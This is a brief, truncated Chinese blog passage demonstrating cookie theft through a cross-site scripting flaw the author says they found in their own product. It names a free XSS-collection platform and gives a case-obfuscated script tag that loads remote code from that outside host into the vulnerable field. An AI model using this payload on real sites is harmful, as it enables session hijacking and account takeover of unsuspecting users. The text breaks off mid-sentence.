利用xss漏洞竊取cookie登錄

今天在測試自己產品的時候,發現有個地方輸入框執行javascript腳本。 正好趁着這個機會給小夥伴們演示xss的危害。 首先在XSS平臺上搭建一個測試項目。 我用的是http://xss.fbisb.com這個的免費平臺 項目配置選擇默認就可以了。 然後直接複製平臺提供的代碼到存在xss漏洞的地方 <sCRiPt sRC=http://xss.fbisb.com/10bt></sCrIpT> 保
相關文章
相關標籤/搜索